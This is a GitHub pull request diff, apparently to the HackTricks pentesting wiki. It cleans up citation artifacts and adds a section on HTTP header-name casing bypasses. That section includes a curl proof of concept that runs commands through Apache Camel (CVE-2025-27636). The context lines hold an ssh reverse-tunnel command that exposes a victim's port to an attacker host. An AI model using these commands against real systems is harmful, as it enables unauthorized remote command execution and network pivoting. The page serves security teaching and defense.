Skip to content

CVE-2025-27636 – Remote Code Execution in Apache Camel via C... #1093

New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Merged
Show file tree
Hide file tree
Changes from all commits
Commits
File filter

Filter by extension

Filter by extension

Conversations
Failed to load comments.
Loading
Jump to
Jump to file
Failed to load files.
Loading
Diff view
Diff view
7 changes: 3 additions & 4 deletions src/generic-hacking/tunneling-and-port-forwarding.md
Original file line number Diff line number Diff line change
Expand Up @@ -107,7 +107,7 @@ route add -net 10.0.0.0/16 gw 1.1.1.1

> [!NOTE]
> **Security – Terrapin Attack (CVE-2023-48795)**
> The 2023 Terrapin downgrade attack can let a man-in-the-middle tamper with the early SSH handshake and inject data into **any forwarded channel** ( `-L`, `-R`, `-D` ). Ensure both client and server are patched (**OpenSSH ≥ 9.6/LibreSSH 6.7**) or explicitly disable the vulnerable `[email protected]` and `*[email protected]` algorithms in `sshd_config`/`ssh_config` before relying on SSH tunnels. citeturn4search0
> The 2023 Terrapin downgrade attack can let a man-in-the-middle tamper with the early SSH handshake and inject data into **any forwarded channel** ( `-L`, `-R`, `-D` ). Ensure both client and server are patched (**OpenSSH ≥ 9.6/LibreSSH 6.7**) or explicitly disable the vulnerable `[email protected]` and `*[email protected]` algorithms in `sshd_config`/`ssh_config` before relying on SSH tunnels.

## SSHUTTLE

Expand Down Expand Up @@ -686,7 +686,7 @@ Start the connector:
cloudflared tunnel run mytunnel
```

Because all traffic leaves the host **outbound over 443**, Cloudflared tunnels are a simple way to bypass ingress ACLs or NAT boundaries. Be aware that the binary usually runs with elevated privileges – use containers or the `--user` flag when possible. citeturn1search0
Because all traffic leaves the host **outbound over 443**, Cloudflared tunnels are a simple way to bypass ingress ACLs or NAT boundaries. Be aware that the binary usually runs with elevated privileges – use containers or the `--user` flag when possible.

## FRP (Fast Reverse Proxy)

Expand Down Expand Up @@ -724,7 +724,7 @@ sshTunnelGateway.bindPort = 2200 # add to frps.toml
ssh -R :80:127.0.0.1:8080 v0@attacker_ip -p 2200 tcp --proxy_name web --remote_port 9000
```

The above command publishes the victim’s port **8080** as **attacker_ip:9000** without deploying any additional tooling – ideal for living-off-the-land pivoting. citeturn2search1
The above command publishes the victim’s port **8080** as **attacker_ip:9000** without deploying any additional tooling – ideal for living-off-the-land pivoting.

## Other tools to check

Expand All @@ -734,4 +734,3 @@ The above command publishes the victim’s port **8080** as **attacker_ip:9000**
{{#include ../banners/hacktricks-training.md}}



8 changes: 4 additions & 4 deletions src/network-services-pentesting/pentesting-web/django.md
Original file line number Diff line number Diff line change
Expand Up @@ -65,15 +65,15 @@ Send the resulting cookie, and the payload runs with the permissions of the WSGI
---

## Recent (2023-2025) High-Impact Django CVEs Pentesters Should Check
* **CVE-2025-48432** – *Log Injection via unescaped `request.path`* (fixed June 4 2025). Allows attackers to smuggle newlines/ANSI codes into log files and poison downstream log analysis. Patch level ≥ 4.2.22 / 5.1.10 / 5.2.2. citeturn0search0
* **CVE-2024-42005** – *Critical SQL injection* in `QuerySet.values()/values_list()` on `JSONField` (CVSS 9.8). Craft JSON keys to break out of quoting and execute arbitrary SQL. Fixed in 4.2.15 / 5.0.8. citeturn1search2
* **CVE-2025-48432** – *Log Injection via unescaped `request.path`* (fixed June 4 2025). Allows attackers to smuggle newlines/ANSI codes into log files and poison downstream log analysis. Patch level ≥ 4.2.22 / 5.1.10 / 5.2.2.
* **CVE-2024-42005** – *Critical SQL injection* in `QuerySet.values()/values_list()` on `JSONField` (CVSS 9.8). Craft JSON keys to break out of quoting and execute arbitrary SQL. Fixed in 4.2.15 / 5.0.8.

Always fingerprint the exact framework version via the `X-Frame-Options` error page or `/static/admin/css/base.css` hash and test the above where applicable.

---

## References
* Django security release – "Django 5.2.2, 5.1.10, 4.2.22 address CVE-2025-48432" – 4 Jun 2025. citeturn0search0
* OP-Innovate: "Django releases security updates to address SQL injection flaw CVE-2024-42005" – 11 Aug 2024. citeturn1search2
* Django security release – "Django 5.2.2, 5.1.10, 4.2.22 address CVE-2025-48432" – 4 Jun 2025.
* OP-Innovate: "Django releases security updates to address SQL injection flaw CVE-2024-42005" – 11 Aug 2024.

{{#include /banners/hacktricks-training.md}}
Original file line number Diff line number Diff line change
Expand Up @@ -193,8 +193,46 @@ Lastly, HSTS is a security feature that forces browsers to communicate with serv
Strict-Transport-Security: max-age=3153600
```

## Header Name Casing Bypass

HTTP/1.1 defines header field‐names as **case-insensitive** (RFC 9110 §5.1). Nevertheless, it is very common to find custom middleware, security filters, or business logic that compare the *literal* header name received without normalising the casing first (e.g. `header.equals("CamelExecCommandExecutable")`). If those checks are performed **case-sensitively**, an attacker may bypass them simply by sending the same header with a different capitalisation.

Typical situations where this mistake appears:

* Custom allow/deny lists that try to block “dangerous” internal headers before the request reaches a sensitive component.
* In-house implementations of reverse-proxy pseudo-headers (e.g. `X-Forwarded-For` sanitisation).
* Frameworks that expose management / debug endpoints and rely on header names for authentication or command selection.

### Abusing the bypass

1. Identify a header that is filtered or validated server-side (for example, by reading source code, documentation, or error messages).
2. Send the **same header with a different casing** (mixed-case or upper-case). Because HTTP stacks usually canonicalise headers only *after* user code has run, the vulnerable check can be skipped.
3. If the downstream component treats headers in a case-insensitive way (most do), it will accept the attacker-controlled value.

### Example: Apache Camel `exec` RCE (CVE-2025-27636)

In vulnerable versions of Apache Camel the *Command Center* routes try to block untrusted requests by stripping the headers `CamelExecCommandExecutable` and `CamelExecCommandArgs`. The comparison was done with `equals()` so only the exact lowercase names were removed.

```bash
# Bypass the filter by using mixed-case header names and execute `ls /` on the host
curl "http://<IP>/command-center" \
-H "CAmelExecCommandExecutable: ls" \
-H "CAmelExecCommandArgs: /"
```

The headers reach the `exec` component unfiltered, resulting in remote command execution with the privileges of the Camel process.

### Detection & Mitigation

* Normalise all header names to a single case (usually lowercase) **before** performing allow/deny comparisons.
* Reject suspicious duplicates: if both `Header:` and `HeAdEr:` are present, treat it as an anomaly.
* Use a positive allow-list enforced **after** canonicalisation.
* Protect management endpoints with authentication and network segmentation.


## References

- [CVE-2025-27636 – RCE in Apache Camel via header casing bypass (OffSec blog)](https://www.offsec.com/blog/cve-2025-27636/)
- [https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/Content-Disposition](https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/Content-Disposition)
- [https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers](https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers)
- [https://web.dev/security-headers/](https://web.dev/security-headers/)
Expand Down